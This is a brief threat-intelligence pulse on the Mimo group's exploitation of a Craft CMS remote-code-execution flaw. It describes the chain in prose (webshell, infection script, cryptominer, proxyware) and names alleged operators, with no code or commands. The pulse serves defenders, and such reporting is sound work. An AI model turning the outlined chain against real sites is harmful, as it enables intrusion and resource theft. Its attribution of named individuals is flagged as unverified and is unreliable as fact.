The Sharp Taste of Mimo'lette: Analyzing Mimo's Latest Campaign targeting Craft CMS
Between February and May, multiple exploitations of CVE-2025-32432, a Remote Code Execution vulnerability in Craft CMS, were observed. The attack chain involves deploying a webshell, downloading an infection script, and executing malicious payloads including a loader, crypto miner, and residential proxyware. The Mimo intrusion set is believed responsible, using distinctive identifiers like '4l4md4r' and 'n1tr0'. The group deploys XMRig for cryptomining and IPRoyal for bandwidth monetization. Two potential operators, 'EtxArny' and 'N1tr0', were identified through social media analysis. While showing interest in Middle Eastern affairs, the group's primary motivation appears financial. Detection opportunities include monitoring for unusual processes in temporary directories and kernel module alterations.
Pulse ID: 68360c3f4169ef29b7c93f6f
Pulse Link: https://otx.alienvault.com/pulse/68360c3f4169ef29b7c93f6f
Pulse Author: AlienVault
Created: 2025-05-27 19:02:23
Be advised, this data is unverified and should be considered preliminary. Always do further verification.